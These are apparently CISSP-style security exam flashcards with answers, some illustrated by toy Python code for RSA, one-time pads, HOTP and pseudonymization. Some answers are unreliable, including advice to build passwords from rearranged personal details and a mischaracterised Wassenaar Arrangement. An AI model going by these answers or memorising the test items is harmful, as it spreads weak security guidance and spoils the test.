A. Recurring passwords are static passwords with reuse and are considered to be a relatively weak security mechanism. Users tend to use easily guessed passwords. Other weaknesses include spoofing users, users stealing passwords through observing keystrokes, and users sharing passwords. The unauthorized use of passwords by outsiders (hackers) or insiders is a primary concern, and this is considered the least efficient and least effective security mechanism for re-authentication. Nonrecurring passwords is incorrect because they provide a strong form of re-authentication. Examples include a challenge-response protocol or a dynamic password generator where a unique value is generated for each session. These values are not repeated and are good for that session only. Tokens can help in re-authenticating a user or transaction. Memory tokens store but do not process information. Smart tokens expand the functionality of a memory token by incorporating one or more integrated circuits into the token itself. In other words, smart tokens store and process information. Except for passwords, all the other methods listed in the question are examples of advanced authentication methods that can be applied to re-authentication.
752
In electronic authentication, which of the following can be used to derive, guess, or crack the value of the token secret or spoof the possession of the token? a. Private credentials b. Public credentials c. Paper credentials d. Electronic credentials
A. A private credential object links a user’s identity to a representation of the token in a way that the exposure of the credential to unauthorized parties can lead to an exposure of the token secret. A private credential can be used to derive, guess, or crack the value of the token secret or spoof the possession of the token. Therefore, it is important that the contents of the private credential be kept confidential (e.g., hashed password values). Public credentials are shared widely, do not lead to an exposure of the token secret, and have little or no confidentiality requirements. Paper credentials are documents that attest to the identity of an individual (e.g., passports, birth certificates, and employee identity cards) and are based on written signatures, seals, special papers, and special inks. Electronic credentials bind an individual’s name to a token with the use of X.509 certificates and Kerberos tickets.
753
Which of the following pairs of high-level system services provide controlled access to networks? a. Access control lists and access privileges b. Identification and authentication c. Certification and accreditation d. Accreditation and assurance
B. Controlling access to the network is provided by the network’s identification and authentication services, which go together. This service is pivotal in providing controlled access to the resources and services offered by the network and in verifying that the mechanisms provide proper protection. Identification is the process that enables recognition of an entity by a computer system, generally by the use of unique machine-readable usernames. Authentication is the verification of the entity’s identification. That is when the host, to whom the entity must prove his identity, trusts (through an authentication process) that the entity is who he claims to be. The threat to the network that the identification and authentication service must protect against is impersonation. Access control list (ACL) and access privileges do not provide controlled access to networks because ACL is a list of the subjects that are permitted to access an object and the access rights (privileges) of each subject. This service comes after initial identification and authentication service. Certification and accreditation services do not provide controlled access to networks because certification is the administrative act of approving a computer system for use in a particular application. Accreditation is the management’s formal acceptance of the adequacy of a computer system’s security. Certification and accreditation are similar in concept. This service comes after initial identification and authentication service. Accreditation and assurance services do not provide controlled access to networks because accreditation is the management’s formal acceptance of the adequacy of a computer system’s security. Assurance is confidence that a computer system design meets its requirements. Again, this service comes after initial identification and authentication service.
754
Which of the following is not subjected to impersonation attacks? a. Packet replay b. Forgery c. Relay d. Interception
A. Packet replay is one of the most common security threats to network systems, similar to impersonation and eavesdropping in terms of damage, but dissimilar in terms of functions. Packet replay refers to the recording and retransmission of message packets in the network. It is a significant threat for programs that require authentication sequences because an intruder could replay legitimate authentication sequence messages to gain access to a system. Packet replay is frequently undetectable but can be prevented by using packet timestamping and packet-sequence counting. Forgery is incorrect because it is one of the ways an impersonation attack is achieved. Forgery is attempting to guess or otherwise fabricate the evidence that the impersonator knows or possesses. Relay is incorrect because it is one of the ways an impersonation attack is achieved. Relay is where one can eavesdrop upon another’s authentication exchange and learn enough to impersonate a user. Interception is incorrect because it is one of the ways an impersonation attack is achieved. Interception is where one can slip in between the communications and “hijack” the communications channel.
755
Which of the following security features is not supported by the principle of least privilege? a. All or nothing privileges b. The granularity of privilege c. The time bounding of privilege d. Privilege inheritance
A. The purpose of a privilege mechanism is to provide a means of granting specific users or processes the ability to perform security relevant actions for a limited time and under a restrictive set of conditions, while still permitting tasks properly authorized by the system administrator. This is the underlying theme behind the security principle of least privilege. It does not imply an “all or nothing” privilege. The granularity of privilege is incorrect because it is one of the security features supported by the principle of least privilege. A privilege mechanism that supports granularity of privilege can enable a process to override only those security-relevant functions needed to perform the task. For example, a backup program needs to override only read restrictions, not the write or execute restriction on files. The time bounding of privilege is incorrect because it is one of the security features supported by the principle of least privilege. The time bounding of privilege is related in that privileges required by an application or a process can be enabled and disabled as the application or process needs them. Privilege inheritance is incorrect because it is one of the security features supported by the principle of least privilege. Privilege inheritance enables a process image to request that all, some, or none of its privileges get passed on to the next process image. For example, application programs that execute other utility programs need not pass on any privileges if the utility program does not require them.
755
Passwords are used as a basic mechanism to identify and authenticate a system user. Which of the following password related factors cannot be tested with automated vulnerability testing tools? a. Password length b. Password lifetime c. Password secrecy d. Password storage
C. No automated vulnerability-testing tool can ensure that system users have not disclosed their passwords; thus secrecy cannot be guaranteed. Password length can be tested to ensure that short passwords are not selected. Password lifetime can be tested to ensure that they have a limited lifetime. Passwords should be changed regularly or whenever they may have been compromised. Password storage can be tested to ensure that they are protected to prevent disclosure or unauthorized modification.
756
Use of login IDs and passwords is the most commonly used mechanism for which of the following? a. Providing dynamic verification of a user b. Providing static verification of a user c. Providing a strong user authentication d. Batch and online computer systems alike
B. By definition, a static verification takes place only once at the start of each login session. Passwords may or may not be reusable. Dynamic verification of a user takes place when a person types on a keyboard and leaves an electronic signature in the form of keystroke latencies in the elapsed time between keystrokes. For well-known, regularly typed strings, this signature can be quite consistent. Here is how a dynamic verification mechanism works: When a person wants to access a computer resource, he is required to identify himself by typing his name. The latency vector of the keystrokes of this name is compared with the reference signature stored in the computer. If this claimant’s latency vector and the reference signature are statistically similar, the user is granted access to the system. The user is asked to type his name a number of times to provide a vector of mean latencies to be used as a reference. This can be viewed as an electronic signature of the user. Passwords do not provide a strong user authentication. If they did, there would not be a hacker problem today. Passwords provide the weakest user authentication due to their sharing and guessable nature. Only online systems require a user ID and password from a user due to their interactive nature. Only batch jobs and files require a user ID and password when submitting a job or modifying a file. Batch systems are not interactive.
757
Which of the following password selection procedures would be the most difficult to remember? a. Reverse or rearrange the characters in the user’s birthday b. Reverse or rearrange the characters in the user’s annual salary c. Reverse or rearrange the characters in the user’s spouse’s name d. Use randomly generated characters
D. Password selection is a difficult task to balance between password effectiveness and its remembrance by the user. The selected password should be simple to remember for oneself and difficult for others to know. It is no advantage to have a scientifically generated password if the user cannot remember it. Using randomly generated characters as a password is not only difficult to remember but also easy to publicize. Users will be tempted to write them down in a conspicuous place if the password is difficult to remember. The approaches in the other three choices would be relatively easy to remember due to the user familiarity with the password origin. A simple procedure is to use well-known personal information that is rearranged.
758
How many SOC reports are there? 1, 2 or 3
3
759
Which SOC report is for financial reporting? SOC1 SOC2 SOC3
SOC1
760
Which SOC report is for operations compliance? SOC1 SOC2 SOC3
SOC2
761
This SOC report is a snapshot. SOCT1 SOCT2 SOCT3
SOCT1
762
This SOC report is a period of time. SOCT1 SOCT2 SOCT3
SOCT2
763
This SOC report is for a public audience. SOCT1 SOCT2 SOCT3
SOCT3
764
Spell out the OSI layers from bottom to top
Physical
Data link
Network
Transport
Session
Presentation
Application
765
This OSI layer concerns itself with the physical and electrical connections the system uses. It includes:
Wireless frequency links, like Wi-Fi and wireless network connections
Network cabling
Light-speed transmission, such as fiber-optic cabling
The physical specifications for data transmission, including voltages and pin layouts
1 2 3 4 5 6 7
1 Physical
766
This OSI layer concerns communication between two devices that are directly connected to each other in the same network. It's responsible for establishing a link that allows data to be exchanged using an agreed protocol. Many network switches operate at this layer. This layer will eventually pass bits to the physical layer.
1 2 3 4 5 6 7
2 Data Link
767
This OSI layer provides higher-level abstractions for coordinating data transfers between devices. Transport controllers determine where data will be sent and the rate at which it should be transferred. This is the layer where TCP and UDP are implemented, providing the port numbers that allow devices to expose multiple communication channels. Load balancing is often situated at this layer as a result, allowing traffic to be routed between ports on a target device. Transport mechanisms are expected to guarantee successful communication: stringent error controls are applied to recover from packet loss and retry failed transfers, and flow control is enforced so the sender doesn't overwhelm the remote device by sending data more quickly than the available bandwidth permits.
1 2 3 4 5 6 7
4 Transport
768
This OSI layer creates ongoing communication sessions between two devices. Sessions are used to negotiate new connections, agree on their duration, and gracefully close down the connection once the data exchange is complete. This layer ensures that sessions remain open long enough to transfer all the data that's being sent. Checkpoint control is another responsibility held by this layer. Sessions can define checkpoints to facilitate progress updates and resumable transmissions. A new checkpoint could be set every few megabytes for a file upload, allowing the sender to continue from a particular point if the transfer gets interrupted.
1 2 3 4 5 6 7
5 Session
769
This OSI layer handles preparation of data for the application layer that comes next in the model. After data has made it up from the hardware, through the data link, and across the transport, it's almost ready to be consumed by high-level components. Decryption, decoding, and decompression are three common operations found at this level. This layer processes received data into formats that can eventually be utilized by a client application. Similarly, outward-bound data is reformatted into compressed and encrypted structures that are suitable for network transmission. TLS is one major technology that's part of the presentation layer. Certificate verification and data decryption are handled before requests reach the network client, allowing information to be consumed with confidence that it's authentic.
1 2 3 4 5 6 7
6 Presentation
770
This OSI layer is the top of the stack. It represents the functionality that's perceived by network end users. Applications in the OSI model provide a convenient end-to-end interface to facilitate complete data transfers, without making you think about hardware, data links, sessions, and compression. HTTP, FTP, DHCP, DNS, and SSH all exist at this layer. These are high-level mechanisms which permit direct transfers of user data between an origin device and a remote server. You only need minimal knowledge of the workings of the other layers.
1 2 3 4 5 6 7
7 Application
771
For Forensics "I prefer counting euros as prime dollar"
(I prefer counting euros as prime dollar) Forensic Investigation Process
1. Identification
2. Preservation
3. Collection
4. Examination
5. Analysis
6. Presentation
7. Decision
773
Software Development Life Cycle "Re Do Damn Test Right"
(Re Do Damn Test Right) Software Development Life Cycle
1. Requirements gathering
2. Design
3. Develop
4. Test
5. Release
774
Business Continuity Plan "I believe people retain concepts through memory"
Business Continuity Plan (BCP) (I believe people retain concepts through memory)
1. Initiation
2. BIA (Impact)
3. Preventative
4. Recovery
5. Continuity
6. Test
7. Manage/Maintain
775
Some common frameworks are:
ISO 27001 – information security management system, which focuses on governance.
ISO 27002 – security controls, techniques, and methods.
ITIL – how IT can serve business functions; remember it by thinking “I TILt it this way, or that way” for the business.
NIST Special Publications (risk management frameworks), such as 800-53, which is a set of security controls, and 800-37, which is the risk management framework.
CSA STAR – from the Cloud Security Alliance, which publishes standards for cloud security. Of interest: Tier 1, in which participants self-assess by filling out a questionnaire; Tier 2, a third-party assessment; and Tier 3 (still in draft), continuous monitoring by a certified independent organization.
HITRUST – a collection of frameworks compiled into a single resource with the objective of normalizing the different sets of security requirements into a single trusted certification/assessment.
Privacy Management Framework (PMF) – created by the AICPA as a revision of the 2009 Generally Accepted Privacy Principles (GAPP). It incorporates local information and data privacy laws and standards, including GDPR, and updates to the AICPA’s Trust Services Criteria (TSC).
SWIFT – a security control framework for financial and payment card system builders. PCI is for payment card processors only, whereas SWIFT has a much broader scope. https://www.swift.com/about-us
776
Candidates must be aware of the difference between policies, standards, procedures, and guidelines.
Guidelines – can guide policy and any of the levels below, and contain recommendations and suggestions, but they are not required. Within the hierarchy, they can be above, between, or at the side of the primary ladder presented here.
Policy – should have the following components:
High-level overview of security strategy or goals
Data classifications (confidential, sensitive, etc.)
Type of access management (whether role-based, etc.)
Expected user behavior with the entity’s IT systems and data
High-level personnel security practices, such as background checks
A common policy creation process is one where the policy is written by subject matter experts (SMEs), shared with impacted parties for edits, and then approved by senior management.
Guidelines – can guide standards as well, but they are not required.
Standard – should have the following elements:
Can come from statutory/administrative law, professional organizations, or industry groups
Describes settings, expectations of performance, configurations, and specific requirements
Guidelines – can guide procedures as well.
Procedures – contain specific, repeatable steps; very task-oriented. It’s essential that staff can locate and execute procedures (and they must be detailed enough to carry out the tasks).
Candidates also need to be aware of the breadth vs. depth concept. This refers to the scope of policy versus the detail of procedures, and the span of detail needed to go from one to the other. As shown above, ISC2’s new framework on this indicates that guidelines can literally fall anywhere in this hierarchy, including the formation of policy, but the general hierarchy is still that policy has the most breadth and procedures have the least (but have more depth) since they are more specific.
777
Risk analysis can be done in two ways, qualitative and quantitative:
Qualitative – is opinion based and more of a narrative discussion. A lot of organizations try to pretend they are using quantitative methods when in fact they are using qualitative methods. The solution is to use the factor analysis of information risk (FAIR) method, which is a simple way of keeping analyses quantitative.
Quantitative – is numeric and value based; this is the preferred method because it is more objective. Simulations are a way to get numbers and samples in order to be quantitative. Some examples are penetration testing, desk checks, fuzz testing, and walkthroughs.
778
Regulatory standards – these are requirements created by government bodies that are overseen by regulators (typically the government body that established the regulation), and are enforced with punitive measures, typically fines, court orders, or imprisonment. They usually have the word “Act” or “Law” in them. Examples include:
Privacy Act
Sarbanes-Oxley Act
Health Insurance Portability and Accountability Act
Gramm-Leach-Bliley Act
Federal Information Security Management Act
779
Wassenaar Agreement
Trans border protection deal
780
DRM is a concept that candidates need to be familiar with. Here are the elements of a DRM solution:
Persistency – Access controls follow the material wherever it goes. The best example of this is a DVD that carries its encryption wherever it goes.
Dynamic policy control – This refers to centralized permissions management, typically for an organization that needs to allow the owner of the intellectual property to manage and update rights to access the data.
Automatic expiration – A license can expire automatically on a specific date, whether for a specific installation or at a point in time where the software becomes public domain.
Continuous audit trail – Captures all activity on the material: views, access, modification, copying, etc.
Interoperability – This concept refers to the solution fitting into any environment: Windows, Linux, email, file structure, or access control methods.
781
There are also several types of NDAs to be aware of for the exam: Unilateral NDA – a one-way disclosure, meaning one party discloses something, for example a flat file sent to another organization for its own contracted use. Multilateral NDA – three or more parties exchange confidential information under one agreement. Non-compete agreement (NCA) – the receiving party agrees not to use what it learns from you to become your competitor.
782
Once contingency procedures have brought the critical functions back, disaster recovery is initiated; it represents the effort needed to transition from contingency operations to normal operations. The order is:
Business continuity – mission critical functions
Contingency operations
Disaster recovery
The acronym "BCDR" is frequently used for business continuity and disaster recovery, but you can also use it to visualize the order in which recovery procedures are carried out at a high level. BC and DR efforts are often performed concurrently by the same or related functions in the organization. A plan should be developed either for BC and DR separately, or together as a BCDR plan.
Recovery objectives
Recovery objectives must be set by senior management. Terms to know:
Maximum allowable outage (MAO) – previously known as MTD (maximum tolerable downtime) and MAD; the maximum time operations can be down before the business goes under.
Recovery point objective (RPO) – the maximum amount of data loss the business can tolerate, expressed as time (how far back the last usable copy of the data may be).
Recovery time objective (RTO) – the targeted amount of time within which business operations are to be restored (the key word is goal); it must be shorter than the MAO.
783
What is an asset? An asset is anything that is valuable, but usually this means:
Data (such as PII)
Software
IT components
Intellectual property
Brand
Reputation
Real estate/facilities
"Resource" is another term for asset. Assets and resources are valued in two ways:
Qualitative – characterized by a classification such as confidential or proprietary
Quantitative – value is expressed monetarily
784
The asset classification process consists of five steps:
Create an asset inventory
Assign ownership
Classify (based on value)
Protect (based on classification)
Assess and review
To memorize the asset classification process, think of CACPA, which rhymes with "cat paw." There is a similar asset protection process with three simpler steps:
Identify, locate, and value
Classify (based on value)
Protect (based on classification)
786
IT asset management lifecycle – the mnemonic is "PAADMR" (bear with me, I'll explain). Think of this "lifecycle" as a process instead; that makes it easier to distinguish from the other "lifecycles" presented here.
Planning – identify the assets, put a value on them, and put them in the inventory.
Assigning the security needs – classify and categorize the assets. This step likely includes assigning protection levels or baselines if they exist.
Acquiring the asset(s) – whether by creating the software internally or purchasing the hardware.
Deployment – deploying the assets and conducting training for all levels of users and support functions.
Managing – ongoing, continuous security assessment of the assets, including backup and recovery activities.
Retiring – obviously includes disposal.
787
Now on to the Data Security Lifecycle. This concept was rebranded and moved from Domain 7, so you may recognize it:
Create – creation or collection of the data. This may also be where the data is classified and valued; read between the lines here: this could be the step where security requirements are assigned but not yet implemented.
Store – where to put the data as it is created/collected. This could be where protection levels are applied (note: applying protections is different from "assigning" them). ISC2 says the storage step is often done at the same time as the creation step.
Use – processing of the data; using it internally. It is typically unencrypted while "in process".
Share – sending the data outside to third parties; includes selling, publishing, data exchange agreements, etc. The common body of knowledge talks about having a digital rights management solution in place to control the flow of data, and a data loss prevention solution in place to detect information leakage.
Archive – long-term storage, when the data is not regularly used or has left active use. This is where the age of technology comes into play, along with EOL and EOS, which need to be considered in terms of the data's availability. As always, protection levels at this phase depend on classification.
Destruction – permanent destruction of the data. The method of disposal depends on the data's classification.
788
Remember that if something is encrypted with a private key, the corresponding public key (which is publicly available) is the only thing that can decrypt it. This is the basis of digital signatures: a value that the public key turns back into the expected message can only have been produced by the holder of the private key, so the public key proves authenticity, not confidentiality. In practice a signature is computed over a hash of the message using a padding scheme, not over the raw message.
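As an added illustration of that card (this is not code from the flashcard source), textbook RSA with the toy primes p = 61 and q = 53 shows that whatever one key of the pair transforms, only the other key of the pair reverses. The primes, the exponent 17 and the message 65 are assumptions chosen for the demo; there is no padding or hashing, so this is for the exam concept only, never for real use.

```python
# Added illustration (not from the flashcard source): textbook RSA with toy
# parameters (p=61, q=53, e=17 assumed for the demo). The same modular
# exponentiation serves both directions; which key reverses which is the
# only difference between "encrypt for the owner" and "sign as the owner".

def make_keypair(p: int, q: int, e: int = 17):
    """Return ((e, n), (d, n)) for two primes p, q and public exponent e."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)          # modular inverse of e (Python 3.8+)
    return (e, n), (d, n)

def rsa_apply(key, m: int) -> int:
    """One modular exponentiation with whichever key is supplied."""
    exp, n = key
    if not 0 <= m < n:
        raise ValueError("message must be smaller than the modulus")
    return pow(m, exp, n)

PUBLIC, PRIVATE = make_keypair(61, 53)     # PUBLIC == (17, 3233), PRIVATE == (2753, 3233)

def encrypt_for_owner(m: int) -> int:
    """Confidentiality: anyone can transform with the public key ..."""
    return rsa_apply(PUBLIC, m)

def decrypt_as_owner(c: int) -> int:
    """... and only the private-key holder reverses it."""
    return rsa_apply(PRIVATE, c)

def sign_as_owner(m: int) -> int:
    """Authenticity: only the private-key holder can produce this value ..."""
    return rsa_apply(PRIVATE, m)

def verify_with_public(s: int) -> int:
    """... and anyone holding the public key can reverse it to recover m."""
    return rsa_apply(PUBLIC, s)

def signature_is_valid(m: int, s: int) -> bool:
    """The public key proves who produced s, it keeps nothing secret."""
    return verify_with_public(s) == m

if __name__ == "__main__":
    m = 65                                     # constructed sample message
    c = encrypt_for_owner(m)
    print("ciphertext", c, "-> decrypted", decrypt_as_owner(c))
    s = sign_as_owner(m)
    print("signature", s, "-> valid", signature_is_valid(m, s))
    # Because RSA is a permutation of the residues, changing s by one always
    # maps to a different message, so the check fails deterministically.
    print("tampered valid?", signature_is_valid(m, (s + 1) % PUBLIC[1]))
```

The point to take from the exam card is that the private exponent d and the public exponent e are interchangeable as operations; what differs is who may hold each one, and therefore what a successful reversal proves.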
789
When the model is "no read up" it always refers to Bell-LaPadula, so the correct answer is the simple security property of the Bell-LaPadula model. Clark-Wilson and Biba are concerned with integrity; both have an "I" in the name (memorization trick).
790
The difference between a one-time passcode and a one-time pad is: The passcode is used to mask the contents, the pad is used to encrypt the contents The key is used to encrypt the pad, the pad is used to mask the passcode The pad is used to encrypt contents, the passcode is used to control access The passcode is used to encrypt the key, and the pad is used to access the key
The pad is used to encrypt contents, the passcode is used to control access
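The two "OTP"s on that card side by side, as an added example that is not part of the flashcard source. The one-time pad encrypts content by XORing it with a random key of the same length that is used exactly once; reusing the pad is the classic failure mode, so the block also shows what leaks. The one-time passcode is HOTP (RFC 4226), the HMAC-counter scheme behind hardware tokens and the basis of TOTP; it proves possession of a shared secret and gates access. The plaintexts are constructed, and the HOTP secret is the published RFC 4226 test secret, not a real one.

```python
# Added illustration (not from the flashcard source). A one-time PAD
# encrypts content; a one-time PASSCODE (HOTP, RFC 4226) controls access.
# Sample plaintexts are constructed; the HOTP secret is RFC 4226's test vector.
import hashlib
import hmac
import secrets

# ---- one-time pad: key random, as long as the message, never reused ----
def otp_key(length: int) -> bytes:
    return secrets.token_bytes(length)          # CSPRNG, not random.random()

def otp_xor(data: bytes, key: bytes) -> bytes:
    """XOR is its own inverse, so this both encrypts and decrypts."""
    if len(key) < len(data):
        raise ValueError("pad shorter than message: that is not a one-time pad")
    return bytes(d ^ k for d, k in zip(data, key))

def two_time_pad_leak(c1: bytes, c2: bytes) -> bytes:
    """If one pad is used twice, c1 XOR c2 == p1 XOR p2: the key cancels out
    and the attacker recovers the relation between plaintexts without it."""
    return bytes(a ^ b for a, b in zip(c1, c2))

# ---- one-time passcode: HOTP = truncate(HMAC-SHA1(secret, counter)) ----
def hotp(secret: bytes, counter: int, digits: int = 6) -> int:
    msg = counter.to_bytes(8, "big")
    mac = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                      # dynamic truncation (RFC 4226 5.3)
    code = ((mac[offset] & 0x7F) << 24 | mac[offset + 1] << 16
            | mac[offset + 2] << 8 | mac[offset + 3])
    return code % (10 ** digits)

def verify_passcode(secret: bytes, counter: int, submitted: str) -> bool:
    """Server side: recompute and compare in constant time so response
    timing does not become an oracle for the correct digits."""
    expected = f"{hotp(secret, counter):06d}"
    return hmac.compare_digest(expected, submitted)

if __name__ == "__main__":
    p1, p2 = b"ATTACK AT DAWN", b"RETREAT NOW!!!"   # constructed, equal length
    k = otp_key(len(p1))
    print(otp_xor(otp_xor(p1, k), k))               # round trip -> p1
    c1, c2 = otp_xor(p1, k), otp_xor(p2, k)         # pad reused: mistake
    print(two_time_pad_leak(c1, c2) == otp_xor(p1, p2))   # True: key cancelled
    s = b"12345678901234567890"                     # RFC 4226 test secret
    print(hotp(s, 0), verify_passcode(s, 0, "755224"))    # 755224 True
```

Note what each secret protects: the pad must be as long as all the data it will ever cover and is worthless after one use, while the HOTP secret is short, long-lived, and never leaves the token or the server; it authorizes, it does not encrypt anything.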
791
While designing a system, the development team tells you that due to the sensitive nature of the data that will be transmitted, encryption will be needed between the client and the host. What is the best advice for the development team? Seek management advice on what encryption tools are available Link encryption is a possibility End-to-end encryption is a possibility Ensure that key management takes priority
End-to-end encryption is a possibility
793
Restricting traffic disclosure in a star topology by utilizing smart port management might be an example of: A standard A procedure A guideline A policy
A standard
794
A development team is creating a mobile health application that will require a fingerprint followed by facial recognition for authentication into the user’s health records. If authorization is obtained by an identity provider with a token to access the application’s download page, what best describes the application’s authentication? Multi-factor Single factor Level 3 Identity Assurance Two-step verification
Single factor If the application itself authenticates users using biometrics only (something you are), it’s considered single factor.
795
An internal document that details your organization’s incident response process has the following: triage, intake, declaration, investigation, return-to-operational-state, root-cause analysis, root-cause resolution, and lessons-learned discussion. Intake most likely refers to which of the following phases in the ISO/IEC 27035, Information Security Incident Management standard? Analysis Response Assessment and Decision Detection and Reporting
Detection and Reporting. Detection and Reporting is the correct choice because that is where the intake of complaints and suspicious events occurs. Assessment and Decision is not right because that is where analysis and evaluation of evidence occurs (for an incident already reported). Response is not right because that is where containment, eradication and recovery occur. Analysis is a distractor.
796
Your organization uses a reverse proxy transport layer security (TLS) accelerator to handle the TLS handshake for its clients. The TLS acceleration card operates across which layers? Physical and Datalink Network and Transport Physical through Layer 6 Layers 2 and 3
Physical and Datalink. The key term is "card": the card has both a physical "bit pushing" component and a datalink component. Note that the TLS protocol itself runs above the transport layer, so this answer keys on the hardware interface the card presents, not on the layer at which TLS is processed.
797
Performing a delete operation against a file, files, or media. Purging Clearing Erasing Degaussing Destruction
Erasing
798
Preparing media for reuse and ensuring data cannot be recovered using traditional recovery tools Purging Clearing Erasing Degaussing Destruction
Clearing
799
A more intense form of clearing that prepares media for reuse in less secure environments Purging Clearing Erasing Degaussing Destruction
Purging
800
Creates a strong magnetic field that erases data on some media Purging Clearing Erasing Degaussing Destruction
Degaussing
801
The final stage in the lifecycle of media and is the most secure method of sanitizing media Purging Clearing Erasing Degaussing Destruction
Destruction
802
The four levels of data classification:
Class 0 – Public
Class 1 – Confidential or Sensitive
Class 2 – Secret and Private
Class 3 – Top Secret or Confidential/Proprietary
803
In the government data classification "Exceptionally Grave" Top Secret Secret Confidential Unclassified
Top Secret
804
In the government data classification "Serious Damage" Top Secret Secret Confidential Unclassified
Secret
805
In the government data classification "No Damage" Top Secret Secret Confidential Unclassified
Unclassified
807
In non-government data classification "Exceptionally Grave" Confidential/Proprietary Private Sensitive Public
Confidential/Proprietary
808
In non-government data classification "Serious Damage" Confidential/Proprietary Private Sensitive Public
Private
809
In non-government data classification "Damage" Confidential/Proprietary Private Sensitive Public
Sensitive
810
In non-government data classification "No Damage" Confidential/Proprietary Private Sensitive Public
Public
811
Usually a member of senior management. Can delegate some day-to-day duties. Cannot delegate total responsibility. Data Custodian Data Owner
Data Owner
813
Usually someone in the IT department. Does not decide what controls are needed but does implement controls for the data owner Data Owner Data Custodian
Data Custodian
815
Responsible for granting appropriate access to personnel often via RBAC Data Admins User Business/Mission Owners Asset Owners
Data Admins
816
Any person who accesses data via a computing system to accomplish work task. Data Admins User Business/Mission Owners Asset Owners
User
817
Can overlap with the responsibilities of the system owner or be the same role. Data Admins User Business/Mission Owners Asset Owners
Business/Mission Owners
819
Owns asset or system that processes sensitive data and associated security plans Data Admins User Business/Mission Owners Asset Owners
Asset Owners
820
A natural or legal person, public authority, agency, or other body, which processes personal data solely on behalf of the data controller Data Transfer Data Controller Data Processor
Data Processor
821
The person or entity that controls processing of the data Data Transfer Data Controller Data Processor
Data Controller
822
GDPR restricts data transfers to countries outside the EU. Data Transfer Data Controller Data Processor
Data Transfer
823
GDPR language – the process of removing all relevant data so that it is impossible to identify the original subject or person; if done effectively, GDPR no longer applies to the __________ data. Anonymization Pseudonymization
Anonymization
824
GDPR language-The Process of using aliases to represent data. Anonymization Pseudonymization
Pseudonymization
825
Which of the following provides the best protection against the loss of confidentiality for sensitive data? A. Data labels B. Data classifications C. Data handling D. Data degaussing methods
Data classifications provide strong protection against the loss of confidentiality and are the best choice of the available answers. Data labels and proper data handling are based on first identifying data classifications. Data degaussing methods apply only to magnetic media.
826
Administrators regularly back up data on all the servers within your organization. They annotate an archive copy with the server it came from and the date it was created, and transfer it to an unstaffed storage warehouse. Later, they discover that someone leaked sensitive emails sent between executives on the internet. Security personnel discovered some archive tapes are missing, and these tapes probably included the leaked emails. Of the following choices, what would have prevented this loss without sacrificing security? A. Mark the media kept off site. B. Don’t store data off site. C. Destroy the backups off site. D. Use a secure off-site storage facility.
D. Backup media should be protected with the same level of protection afforded the data it contains, and using a secure offsite storage facility would ensure this. The media should be marked, but that won’t protect it if it is stored in an unstaffed warehouse. A copy of backups should be stored offsite to ensure availability if a catastrophe affects the primary location. If copies of data are not stored offsite or offsite backups are destroyed, security is sacrificed by risking availability.
827
Administrators have been using tapes to back up servers in your organization. However, the organization is converting to a different backup system, storing backups on disk drives. What is the final stage in the lifecycle of tapes used as backup media? A. Degaussing B. Destruction C. Declassification D. Retention
B. Destruction is the final stage in the lifecycle of backup media. Because the backup method is no longer using tapes, they should be destroyed. Degaussing and declassifying the tape is done if you plan to reuse it. Retention implies you plan to keep the media, but retention is not needed at the end of its lifecycle
828
You are updating your organization’s data policy, and you want to identify the responsibilities of various roles. Which one of the following data roles is responsible for classifying data? A. Controller B. Custodian C. Owner D. User
C. The data owner is the person responsible for classifying data. A data controller decides what data to process and directs the data processor to process the data. A data custodian protects the integrity and security of the data by performing day-to-day maintenance. Users simply access the data.
829
You are tasked with updating your organization’s data policy, and you need to identify the responsibilities of different roles. Which data role is responsible for implementing the protections defined by the security policy? A. Data custodian B. Data user C. Data processor D. Data controller
A. The data custodian is responsible for the tasks of implementing the protections defined by the security policy and senior management. A data controller decides what data to process and how. Data users are not responsible for implementing the security policy protections. A data processor controls the processing of data and only does what the data controller tells them to do with the data.
830
A company maintains an e-commerce server used to sell digital products via the internet. When a customer makes a purchase, the server stores the following information on the buyer: name, physical address, email address, and credit card data. You’re hired as an outside consultant and advise them to change their practices. Which of the following can the company implement to avoid an apparent vulnerability? A. Anonymization B. Pseudonymization C. Move the company location D. Collection limitation
D. The company can implement a data collection policy of minimization to minimize the amount of data they collect and store. If they are selling digital products, they don’t need the physical address. If they are reselling products to the same customers, they can use tokenization to save tokens that match the credit card data, instead of saving and storing credit card data. Anonymization techniques remove all personal data and make the data unusable for reuse on the website. Pseudonymization replaces data with pseudonyms. Although the process can be reversed, it is not necessary.
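The anonymization/pseudonymization cards above and the collection-limitation answer here describe four different treatments of the same record. The block below applies each of them to one constructed customer record, as an added example that is not from the flashcard source: a keyed pseudonym that the controller can reverse (and which therefore remains personal data), anonymization that drops and generalizes until no lookup table exists, minimization that keeps only what the purpose needs, and tokenization of the card number into a separate vault. The field names, the record, the HMAC key and the vault are all assumptions for the demo.

```python
# Added illustration (not from the flashcard source). Field names, the sample
# record, the pseudonymisation key and the token vault are assumed for the demo.
import hashlib
import hmac
import secrets

# Held by the controller, stored separately from the pseudonymised data set.
PSEUDO_KEY = secrets.token_bytes(32)

def pseudonymise(record: dict, key: bytes = PSEUDO_KEY):
    """Replace direct identifiers with a keyed alias (HMAC, so an attacker
    without the key cannot brute-force names through plain SHA-256).
    Returns the aliased record plus the lookup table: because the controller
    can re-identify, the output is still personal data under GDPR."""
    lookup, out = {}, dict(record)
    for field in ("name", "email"):
        alias = hmac.new(key, record[field].encode(), hashlib.sha256).hexdigest()[:16]
        lookup[alias] = record[field]
        out[field] = alias
    return out, lookup

def reidentify(pseudo: dict, lookup: dict) -> dict:
    out = dict(pseudo)
    for field in ("name", "email"):
        out[field] = lookup[pseudo[field]]
    return out

def anonymise(record: dict) -> dict:
    """Drop direct identifiers and generalise quasi-identifiers so that no
    key or table can restore the subject. Nothing reversible is produced."""
    return {
        "postcode_area": record["postcode"][:2],       # "SW1A 1AA" -> "SW"
        "age_band": f"{record['age'] // 10 * 10}s",     # 34 -> "30s"
        "product": record["product"],
    }

def minimise(record: dict, needed=("email", "product")) -> dict:
    """Collection limitation: keep only what the purpose requires. A seller
    of downloads needs a delivery e-mail, not a street address."""
    return {k: v for k, v in record.items() if k in needed}

CARD_VAULT = {}                  # assumed: in practice a separate, PCI-scoped store

def tokenise_card(pan: str) -> str:
    """Keep a random token in the shop database; the real PAN lives only
    in the vault, which is the only place that can map the token back."""
    token = "tok_" + secrets.token_hex(8)
    CARD_VAULT[token] = pan
    return token

SAMPLE = {                       # constructed record, not a real person
    "name": "Karen C. Park", "email": "kpark@example.com",
    "postcode": "SW1A 1AA", "age": 34, "product": "ebook-42",
}

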